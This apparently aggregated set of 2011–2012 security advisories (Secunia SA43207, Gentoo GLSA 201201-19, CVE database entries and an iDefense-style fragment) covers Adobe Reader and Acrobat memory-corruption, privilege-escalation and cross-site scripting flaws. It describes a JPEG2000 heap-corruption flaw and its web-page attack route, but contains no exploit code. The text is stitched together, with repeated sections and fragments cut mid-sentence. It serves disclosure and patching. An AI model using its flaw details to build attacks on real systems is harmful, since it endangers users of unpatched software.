http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43207
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43207/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43207/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader /
Acrobat, which can be exploited by malicious, local users to gain
escalated privileges and by malicious people to conduct cross-site
scripting attacks and compromise a user's system.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based
versions can be exploited to gain escalated privileges.
4) An unspecified error may allow code execution.
5) An unspecified error when parsing images can be exploited to
corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be
exploited to corrupt memory.
7) An unspecified error in the Macintosh-based versions may allow
code execution.
9) An unspecified error may allow code execution.
10) A input validation error may allow code execution.
11) An input validation error can be exploited to conduct cross-site
scripting attacks.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can
be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in a RGBA file can
be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can
be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can
be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code
execution.
19) A boundary error when decoding U3D image data in a FLI file can
be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8
compressed BMP files can be exploited to cause a heap-based buffer
overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can
be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing bits per pixel and
number of colors if 4/8-bit RLE compressed BMP files can be exploited
to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node
count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF
file can be exploited to corrupt heap memory.
25) An unspecified error when parsing images may allow code
execution.
26) An input validation error can be exploited to conduct cross-site
scripting attacks.
27) An unspecified error in the Macintosh-based versions may allow
code execution.
28) A boundary error in rt3d.dll when parsing certain files can be
exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing a ILBM
texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused due to vulnerabilities in the
bundled version of Adobe Flash Player.
For more information:
SA43267
The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1
and prior, and 10.0 and prior.
SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.
The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.
ORIGINAL ADVISORY:
Adobe (APSB11-03)
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"
References
==========
[ 1 ] CVE-2010-4091
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201102-0021 | CVE-2011-0565 | Adobe Reader and Acrobat Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0585. This vulnerability CVE-2011-0585 Is a different vulnerability.An attacker could execute arbitrary code. Adobe Acrobat and Reader are prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause the affected application to crash.
Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected.
For more information:
SA43207
SOLUTION:
Updated packages are available via Red Hat Network. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43207
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43207/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43207/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader /
Acrobat, which can be exploited by malicious, local users to gain
escalated privileges and by malicious people to conduct cross-site
scripting attacks and compromise a user's system.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based
versions can be exploited to gain escalated privileges.
5) An unspecified error when parsing images can be exploited to
corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be
exploited to corrupt memory.
11) An input validation error can be exploited to conduct cross-site
scripting attacks.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can
be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in a RGBA file can
be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can
be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can
be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code
execution.
19) A boundary error when decoding U3D image data in a FLI file can
be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8
compressed BMP files can be exploited to cause a heap-based buffer
overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can
be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing bits per pixel and
number of colors if 4/8-bit RLE compressed BMP files can be exploited
to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node
count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF
file can be exploited to corrupt heap memory.
26) An input validation error can be exploited to conduct cross-site
scripting attacks.
28) A boundary error in rt3d.dll when parsing certain files can be
exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing a ILBM
texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused due to vulnerabilities in the
bundled version of Adobe Flash Player.
For more information:
SA43267
The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1
and prior, and 10.0 and prior.
SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.
The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.
ORIGINAL ADVISORY:
Adobe (APSB11-03)
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Adobe Reader: Multiple vulnerabilities
Date: January 30, 2012
Bugs: #354211, #382969, #393481
ID: 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities in Adobe Reader might allow remote attackers
to execute arbitrary code or conduct various other attacks.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/acroread < 9.4.7 >= 9.4.7=20
Description
===========
Multiple vulnerabilities have been discovered in Adobe Reader. Please
review the CVE identifiers referenced below for details.
Impact
======
A remote attacker could entice a user to open a specially crafted PDF
file using Adobe Reader, possibly resulting in the remote execution of
arbitrary code, a Denial of Service, or other impact.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"
References
==========
[ 1 ] CVE-2010-4091
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201102-0061 | CVE-2011-0602 | Adobe Reader and Acrobat Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via crafted JP2K record types in a JPEG2000 image in a PDF file, which causes heap corruption, a different vulnerability than CVE-2011-0596, CVE-2011-0598, and CVE-2011-0599. Adobe Reader and Acrobat Contains a vulnerability that allows arbitrary code execution. This vulnerability CVE-2011-0596 , CVE-2011-0598 and CVE-2011-0599 Is a different vulnerability.A third party may execute arbitrary code through the image.
For more information:
SA43207
SOLUTION:
Updated packages are available via Red Hat Network. BACKGROUND
Adobe Reader/Acrobat is a Portable Document Format Viewer (PDF). For
more information, see the vendor's site found at the following link.
http://www.adobe.com/products/reader/
II.
JPEG2000 (JP2K) is an image file format similar to JPEG. In addition to
JPEG markers, JP2K files also provide "boxes" that define different
image properties. Several different JP2K record types are involved in the
vulnerability. It is possible to increment a buffer index beyond the
allocated data, and store pointers to file data at that location. This
can result in the corruption of heap structures and application data,
which leads to the execution of arbitrary code.
III. ANALYSIS
Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the user viewing the web page or opening the
file. Since PDF files can be embedded into web pages and parsed without
interaction by default, this vulnerability can be exploited as a
typical browser vulnerability. To exploit this vulnerability, a
targeted user must load a malicious webpage created by an attacker. An
attacker typically accomplishes this via social engineering or
injecting content into compromised, trusted sites. After the user
visits the malicious web page, no further user interaction is needed.
IV. A full list of vulnerable
Adobe products can be found in Adobe Security Bulletin APSB11-03.
V. WORKAROUND
Disabling the web view mode of Adobe Reader will prevent exploitation
through the browser.
VI. VENDOR RESPONSE
Adobe has addressed this issue with an update. Further details and
patches can be found at the following URL.
http://www.adobe.com/support/security/bulletins/apsb11-03.html
VII. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
11/17/2010 Initial Vendor Notification
